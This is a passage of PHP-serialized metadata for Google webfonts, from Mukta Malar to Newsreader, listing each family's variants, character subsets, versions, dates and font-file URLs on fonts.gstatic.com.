tf\";s:3:\"800\";s:82:\"http://fonts.gstatic.com/s/muktamahee/v15/XRXN3IOIi0hcP8iVU67hA9NtdxoHJndqZCsW.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:791;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Mukta Malar\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:5:\"tamil\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"200\";s:82:\"http://fonts.gstatic.com/s/muktamalar/v12/MCoKzAXyz8LOE2FpJMxZqIMwBtAB62ruoAZW.ttf\";s:3:\"300\";s:82:\"http://fonts.gstatic.com/s/muktamalar/v12/MCoKzAXyz8LOE2FpJMxZqINUBdAB62ruoAZW.ttf\";s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/muktamalar/v12/MCoXzAXyz8LOE2FpJMxZqLv4LfQJwHbn.ttf\";s:3:\"500\";s:82:\"http://fonts.gstatic.com/s/muktamalar/v12/MCoKzAXyz8LOE2FpJMxZqIMMBNAB62ruoAZW.ttf\";s:3:\"600\";s:82:\"http://fonts.gstatic.com/s/muktamalar/v12/MCoKzAXyz8LOE2FpJMxZqIMgA9AB62ruoAZW.ttf\";s:3:\"700\";s:82:\"http://fonts.gstatic.com/s/muktamalar/v12/MCoKzAXyz8LOE2FpJMxZqINEAtAB62ruoAZW.ttf\";s:3:\"800\";s:82:\"http://fonts.gstatic.com/s/muktamalar/v12/MCoKzAXyz8LOE2FpJMxZqINYAdAB62ruoAZW.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:792;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Mukta Vaani\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:8:\"gujarati\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"200\";s:82:\"http://fonts.gstatic.com/s/muktavaani/v13/3JnkSD_-ynaxmxnEfVHPIGXNV8BD-u97MW1a.ttf\";s:3:\"300\";s:82:\"http://fonts.gstatic.com/s/muktavaani/v13/3JnkSD_-ynaxmxnEfVHPIGWpVMBD-u97MW1a.ttf\";s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/muktavaani/v13/3Jn5SD_-ynaxmxnEfVHPIF0FfORL0fNy.ttf\";s:3:\"500\";s:82:\"http://fonts.gstatic.com/s/muktavaani/v13/3JnkSD_-ynaxmxnEfVHPIGXxVcBD-u97MW1a.ttf\";s:3:\"600\";s:82:\"http://fonts.gstatic.com/s/muktavaani/v13/3JnkSD_-ynaxmxnEfVHPIGXdUsBD-u97MW1a.ttf\";s:3:\"700\";s:82:\"http://fonts.gstatic.com/s/muktavaani/v13/3JnkSD_-ynaxmxnEfVHPIGW5U8BD-u97MW1a.ttf\";s:3:\"800\";s:82:\"http://fonts.gstatic.com/s/muktavaani/v13/3JnkSD_-ynaxmxnEfVHPIGWlUMBD-u97MW1a.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:793;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Mulish\";s:8:\"variants\";a:16:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:9:\"200italic\";i:9;s:9:\"300italic\";i:10;s:6:\"italic\";i:11;s:9:\"500italic\";i:12;s:9:\"600italic\";i:13;s:9:\"700italic\";i:14;s:9:\"800italic\";i:15;s:9:\"900italic\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":16:{s:3:\"200\";s:85:\"http://fonts.gstatic.com/s/mulish/v12/1Ptyg83HX_SGhgqO0yLcmjzUAuWexRNRwaClGrw-PTY.ttf\";s:3:\"300\";s:85:\"http://fonts.gstatic.com/s/mulish/v12/1Ptyg83HX_SGhgqO0yLcmjzUAuWexc1RwaClGrw-PTY.ttf\";s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/mulish/v12/1Ptyg83HX_SGhgqO0yLcmjzUAuWexZNRwaClGrw-PTY.ttf\";s:3:\"500\";s:85:\"http://fonts.gstatic.com/s/mulish/v12/1Ptyg83HX_SGhgqO0yLcmjzUAuWexaFRwaClGrw-PTY.ttf\";s:3:\"600\";s:85:\"http://fonts.gstatic.com/s/mulish/v12/1Ptyg83HX_SGhgqO0yLcmjzUAuWexU1WwaClGrw-PTY.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/mulish/v12/1Ptyg83HX_SGhgqO0yLcmjzUAuWexXRWwaClGrw-PTY.ttf\";s:3:\"800\";s:85:\"http://fonts.gstatic.com/s/mulish/v12/1Ptyg83HX_SGhgqO0yLcmjzUAuWexRNWwaClGrw-PTY.ttf\";s:3:\"900\";s:85:\"http://fonts.gstatic.com/s/mulish/v12/1Ptyg83HX_SGhgqO0yLcmjzUAuWexTpWwaClGrw-PTY.ttf\";s:9:\"200italic\";s:88:\"http://fonts.gstatic.com/s/mulish/v12/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsSqeOvHp47LTZFwA.ttf\";s:9:\"300italic\";s:88:\"http://fonts.gstatic.com/s/mulish/v12/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsSd-OvHp47LTZFwA.ttf\";s:6:\"italic\";s:88:\"http://fonts.gstatic.com/s/mulish/v12/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsSKeOvHp47LTZFwA.ttf\";s:9:\"500italic\";s:88:\"http://fonts.gstatic.com/s/mulish/v12/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsSG-OvHp47LTZFwA.ttf\";s:9:\"600italic\";s:88:\"http://fonts.gstatic.com/s/mulish/v12/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsS9-SvHp47LTZFwA.ttf\";s:9:\"700italic\";s:88:\"http://fonts.gstatic.com/s/mulish/v12/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsSzuSvHp47LTZFwA.ttf\";s:9:\"800italic\";s:88:\"http://fonts.gstatic.com/s/mulish/v12/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsSqeSvHp47LTZFwA.ttf\";s:9:\"900italic\";s:88:\"http://fonts.gstatic.com/s/mulish/v12/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsSgOSvHp47LTZFwA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:794;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Murecho\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:6:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:8:\"japanese\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v6\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:86:\"http://fonts.gstatic.com/s/murecho/v6/q5uYsoq3NOBn_I-ggCJg98TBOoNFCMpr5HWZLCpUOaM6.ttf\";s:3:\"200\";s:86:\"http://fonts.gstatic.com/s/murecho/v6/q5uYsoq3NOBn_I-ggCJg98TBOoNFCMrr5XWZLCpUOaM6.ttf\";s:3:\"300\";s:86:\"http://fonts.gstatic.com/s/murecho/v6/q5uYsoq3NOBn_I-ggCJg98TBOoNFCMo15XWZLCpUOaM6.ttf\";s:7:\"regular\";s:86:\"http://fonts.gstatic.com/s/murecho/v6/q5uYsoq3NOBn_I-ggCJg98TBOoNFCMpr5XWZLCpUOaM6.ttf\";s:3:\"500\";s:86:\"http://fonts.gstatic.com/s/murecho/v6/q5uYsoq3NOBn_I-ggCJg98TBOoNFCMpZ5XWZLCpUOaM6.ttf\";s:3:\"600\";s:86:\"http://fonts.gstatic.com/s/murecho/v6/q5uYsoq3NOBn_I-ggCJg98TBOoNFCMq14nWZLCpUOaM6.ttf\";s:3:\"700\";s:86:\"http://fonts.gstatic.com/s/murecho/v6/q5uYsoq3NOBn_I-ggCJg98TBOoNFCMqM4nWZLCpUOaM6.ttf\";s:3:\"800\";s:86:\"http://fonts.gstatic.com/s/murecho/v6/q5uYsoq3NOBn_I-ggCJg98TBOoNFCMrr4nWZLCpUOaM6.ttf\";s:3:\"900\";s:86:\"http://fonts.gstatic.com/s/murecho/v6/q5uYsoq3NOBn_I-ggCJg98TBOoNFCMrC4nWZLCpUOaM6.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:795;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"MuseoModerno\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:99:\"http://fonts.gstatic.com/s/museomoderno/v22/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMlZFuewajeKlCdo.ttf\";s:3:\"200\";s:99:\"http://fonts.gstatic.com/s/museomoderno/v22/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMtZEuewajeKlCdo.ttf\";s:3:\"300\";s:99:\"http://fonts.gstatic.com/s/museomoderno/v22/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMghEuewajeKlCdo.ttf\";s:7:\"regular\";s:99:\"http://fonts.gstatic.com/s/museomoderno/v22/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMlZEuewajeKlCdo.ttf\";s:3:\"500\";s:99:\"http://fonts.gstatic.com/s/museomoderno/v22/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMmREuewajeKlCdo.ttf\";s:3:\"600\";s:99:\"http://fonts.gstatic.com/s/museomoderno/v22/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMohDuewajeKlCdo.ttf\";s:3:\"700\";s:99:\"http://fonts.gstatic.com/s/museomoderno/v22/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMrFDuewajeKlCdo.ttf\";s:3:\"800\";s:99:\"http://fonts.gstatic.com/s/museomoderno/v22/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMtZDuewajeKlCdo.ttf\";s:3:\"900\";s:99:\"http://fonts.gstatic.com/s/museomoderno/v22/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMv9DuewajeKlCdo.ttf\";s:9:\"100italic\";s:102:\"http://fonts.gstatic.com/s/museomoderno/v22/zrfx0HnU0_7wWdMrFcWqSEXlXhPlgPcSP5dZJ54HUa4QicCgGdrS3g.ttf\";s:9:\"200italic\";s:102:\"http://fonts.gstatic.com/s/museomoderno/v22/zrfx0HnU0_7wWdMrFcWqSEXlXhPlgPcSP5dZJ54H0a8QicCgGdrS3g.ttf\";s:9:\"300italic\";s:102:\"http://fonts.gstatic.com/s/museomoderno/v22/zrfx0HnU0_7wWdMrFcWqSEXlXhPlgPcSP5dZJ54HD68QicCgGdrS3g.ttf\";s:6:\"italic\";s:102:\"http://fonts.gstatic.com/s/museomoderno/v22/zrfx0HnU0_7wWdMrFcWqSEXlXhPlgPcSP5dZJ54HUa8QicCgGdrS3g.ttf\";s:9:\"500italic\";s:102:\"http://fonts.gstatic.com/s/museomoderno/v22/zrfx0HnU0_7wWdMrFcWqSEXlXhPlgPcSP5dZJ54HY68QicCgGdrS3g.ttf\";s:9:\"600italic\";s:102:\"http://fonts.gstatic.com/s/museomoderno/v22/zrfx0HnU0_7wWdMrFcWqSEXlXhPlgPcSP5dZJ54Hj6gQicCgGdrS3g.ttf\";s:9:\"700italic\";s:102:\"http://fonts.gstatic.com/s/museomoderno/v22/zrfx0HnU0_7wWdMrFcWqSEXlXhPlgPcSP5dZJ54HtqgQicCgGdrS3g.ttf\";s:9:\"800italic\";s:102:\"http://fonts.gstatic.com/s/museomoderno/v22/zrfx0HnU0_7wWdMrFcWqSEXlXhPlgPcSP5dZJ54H0agQicCgGdrS3g.ttf\";s:9:\"900italic\";s:102:\"http://fonts.gstatic.com/s/museomoderno/v22/zrfx0HnU0_7wWdMrFcWqSEXlXhPlgPcSP5dZJ54H-KgQicCgGdrS3g.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:796;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"My Soul\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/mysoul/v2/3XFqErcuy945_u6KF_Ulk2nnXf0.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:797;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Mystery Quest\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/mysteryquest/v20/-nF6OG414u0E6k0wynSGlujRHwElD_9Qz9E.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:798;O:8:\"stdClass\":8:{s:6:\"family\";s:3:\"NTR\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:6:\"telugu\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:61:\"http://fonts.gstatic.com/s/ntr/v15/RLpzK5Xy0ZjiGGhs5TA4bg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:799;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Nabla\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:12:\"cyrillic-ext\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:4:\"math\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v6\";s:12:\"lastModified\";s:10:\"2022-09-14\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:99:\"http://fonts.gstatic.com/s/nabla/v6/j8_D6-LI0Lvpe7Makz5UhJt9C3uqg_X_75gyGS4jAxsNIjrRNRBUFFR_198.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:800;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Nanum Brush Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:94:\"http://fonts.gstatic.com/s/nanumbrushscript/v22/wXK2E2wfpokopxzthSqPbcR5_gVaxazyjqBr1lO97Q.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:801;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Nanum Gothic\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:3:\"700\";i:2;s:3:\"800\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/nanumgothic/v21/PN_3Rfi-oW3hYwmKDpxS7F_z_tLfxno73g.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/nanumgothic/v21/PN_oRfi-oW3hYwmKDpxS7F_LQv37zlEn14YEUQ.ttf\";s:3:\"800\";s:85:\"http://fonts.gstatic.com/s/nanumgothic/v21/PN_oRfi-oW3hYwmKDpxS7F_LXv77zlEn14YEUQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:802;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Nanum Gothic Coding\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/nanumgothiccoding/v19/8QIVdjzHisX_8vv59_xMxtPFW4IXROwsy6QxVs1X7tc.ttf\";s:3:\"700\";s:100:\"http://fonts.gstatic.com/s/nanumgothiccoding/v19/8QIYdjzHisX_8vv59_xMxtPFW4IXROws8xgecsV88t5V9r4.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:803;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Nanum Myeongjo\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:3:\"700\";i:2;s:3:\"800\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/nanummyeongjo/v20/9Btx3DZF0dXLMZlywRbVRNhxy1LreHQ8juyl.ttf\";s:3:\"700\";s:89:\"http://fonts.gstatic.com/s/nanummyeongjo/v20/9Bty3DZF0dXLMZlywRbVRNhxy2pXV1A0pfCs5Kos.ttf\";s:3:\"800\";s:89:\"http://fonts.gstatic.com/s/nanummyeongjo/v20/9Bty3DZF0dXLMZlywRbVRNhxy2pLVFA0pfCs5Kos.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:804;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Nanum Pen Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/nanumpenscript/v19/daaDSSYiLGqEal3MvdA_FOL_3FkN2z7-aMFCcTU.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:805;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Neonderthaw\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/neonderthaw/v3/Iure6Yx5-oWVZI0r-17AeZZJprVA4XQ0.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:806;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Nerko One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/nerkoone/v15/m8JQjfZSc7OXlB3ZMOjzcJ5BZmqa3A.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:807;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Neucha\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/neucha/v17/q5uGsou0JOdh94bvugNsCxVEgA.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:808;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Neuton\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:6:\"italic\";i:4;s:3:\"700\";i:5;s:3:\"800\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"200\";s:72:\"http://fonts.gstatic.com/s/neuton/v18/UMBQrPtMoH62xUZKAKkfegD5Drog6Q.ttf\";s:3:\"300\";s:72:\"http://fonts.gstatic.com/s/neuton/v18/UMBQrPtMoH62xUZKZKofegD5Drog6Q.ttf\";s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/neuton/v18/UMBTrPtMoH62xUZyyII7civlBw.ttf\";s:6:\"italic\";s:70:\"http://fonts.gstatic.com/s/neuton/v18/UMBRrPtMoH62xUZCyog_UC71B6M5.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/neuton/v18/UMBQrPtMoH62xUZKdK0fegD5Drog6Q.ttf\";s:3:\"800\";s:72:\"http://fonts.gstatic.com/s/neuton/v18/UMBQrPtMoH62xUZKaK4fegD5Drog6Q.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:809;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"New Rocker\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/newrocker/v16/MwQzbhjp3-HImzcCU_cJkGMViblPtXs.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:810;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"New Tegomin\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"japanese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/newtegomin/v10/SLXMc1fV7Gd9USdBAfPlqfN0Q3ptkDMN.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:811;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"News Cycle\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/newscycle/v22/CSR64z1Qlv-GDxkbKVQ_TOcATNt_pOU.ttf\";s:3:\"700\";s:80:\"http://fonts.gstatic.com/s/newscycle/v22/CSR54z1Qlv-GDxkbKVQ_dFsvaNNUuOwkC2s.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:812;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Newsreader\";s:8:\"variants\";a:14:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:9:\"200italic\";i:8;s:9:\"300italic\";i:9;s:6:\"italic\";i:10;s:9:\"500italic\";i:11;s:9:\"600italic\";i:12;s:9:\"700italic\";i:13;s:9:\"800italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":14:{s:3:\"200\";s:112:\"http://fonts.gstatic.com/s/newsreader/v19/cY9qfjOCX1hbuyalUrK49dLac06G1ZGsZBtoBCzBDXXD9JVF438w-I_ADOxEPjCggA.ttf\";s:3:\"300\";s:112:\"http://fonts.gstatic.com/s/newsreader/v19/cY9qfjOCX1hbuyalUrK49dLac06G1ZGsZBtoBCzBDXXD9JVF438wJo_ADOxEPjCggA.ttf\";s:7:\"regular\";s:112:\"http://fonts.gstatic.com/s/newsreader/v19/cY9qfjOCX1hbuyalUrK49dLac06G1ZGsZBtoBCzBDXXD9JVF438weI_ADOxEPjCggA.ttf\";s:3:\"500\";s:112:\"http://fonts.gstatic.com/s/newsreader/v19/cY9qfjOCX1hbuyalUrK49dLac06G1ZGsZBtoBCzBDXXD9JVF438wSo_ADOxEPjCggA.ttf\";s:3:\"600\";s:112:\"http://fonts.gstatic.com/s/newsreader/v19/cY9qfjOCX1hbuyalUrK49dLac06G1ZGsZBtoBCzBDXXD9JVF438wpojADOxEPjCggA.ttf\";s:3:\"700\";s:112:\"http://fonts.gstatic.com/s/newsreader/v19/cY9qfjOCX1hbuyalUrK49dLac06G1ZGsZBtoBCzBDXXD9JVF438wn4jADOxEPjCggA.ttf\";s:3:\"800\";s:112:\"http://fonts.gstatic.com/s/newsreader/v19/cY9qfjOCX1hbuyalUrK49dLac06G1ZGsZBtoBCzBDXXD9JVF438w-IjADOxEPjCggA.ttf\";s:9:\"200italic\";s:114:\"http://fonts.gstatic.com/s/newsreader/v19/cY9kfjOCX1hbuyalUrK439vogqC9yFZCYg7oRZaLP4obnf7fTXglsMyoT-ZAHDWwgECi.ttf\";s:9:\"300italic\";s:114:\"http://fonts.gstatic.com/s/newsreader/v19/cY9kfjOCX1hbuyalUrK439vogqC9yFZCYg7oRZaLP4obnf7fTXglsMx2T-ZAHDWwgECi.ttf\";s:6:\"italic\";s:114:\"http://fonts.gstatic.com/s/newsreader/v19/cY9kfjOCX1hbuyalUrK439vogqC9yFZCYg7oRZaLP4obnf7fTXglsMwoT-ZAHDWwgECi.ttf\";s:9:\"500italic\";s:114:\"http://fonts.gstatic.com/s/newsreader/v19/cY9kfjOCX1hbuyalUrK439vogqC9yFZCYg7oRZaLP4obnf7fTXglsMwaT-ZAHDWwgECi.ttf\";s:9:\"600italic\";s:114:\"http://fonts.gstatic.com/s/newsreader/v19/cY9kfjOCX1hbuyalUrK439vogqC9yFZCYg7oRZaLP4obnf7fTXglsMz2SOZAHDWwgECi.